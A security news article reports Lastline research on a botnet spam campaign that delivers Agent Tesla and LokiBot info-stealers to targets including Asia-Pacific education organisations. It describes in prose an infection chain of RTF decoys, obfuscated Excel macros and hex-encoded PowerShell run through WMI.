Obfuscation Marks- Agent Tesla and LokiBot are common payloads in the botnet-driven spam effort.
A large-scale spam campaign bent on spreading info-stealing malware is applying advanced obfuscation techniques to get around security scanning and maximize infection rates.
According to Lastline researchers, a large botnet is distributing malicious rich text format (RTF) documents that act as downloaders for well-known info-stealers, such as Agent Tesla or LokiBot. These malware variants steal a variety of credentials – including FTP credentials, stored email passwords, passwords stored in the browser, as well as a whole host of other credentials. The effort is linked to another recent spam campaign identified by Cisco Talos, Lastline said.
The firm found that many of the targeted entities are within the education sector in the Asia-Pacific region; however, the campaign also seems to be using a second, “spray-and-pray” approach on other potential victims.
“Some email subjects were quite generic, which implies that attackers used the spam campaign to target the generic public,” according to an analysis, published Thursday. In other cases, “email subjects were customized to specific targets or events, aiming to maximize its infection rate.”
The researchers found that the campaign uses common attack techniques, such as data obfuscation and VBA scripting, but that it also goes to great lengths to hide its infection processes.
Under the Hood
The campaign features malicious attachments in the form of decoy RTF documents. If the user clicks on the attachment, multiple pop-ups prompt the user repeatedly to activate macros for an Excel spreadsheet.
That Excel spreadsheet is a “typical weaponized document with an embedded malicious VBA macro.” The macro itself is hidden via encoding with uncommon Unicode characters.
The macro, once enabled, reads hex-encoded content from one of the spreadsheet’s cells. That content, when decrypted, turns out to be a PowerShell script that is then executed using Windows management Instrumentation (WMI).
The PowerShell script then adds a C# compiler (csc.exe) within its native PowerShell scripts – which is another evasion technique.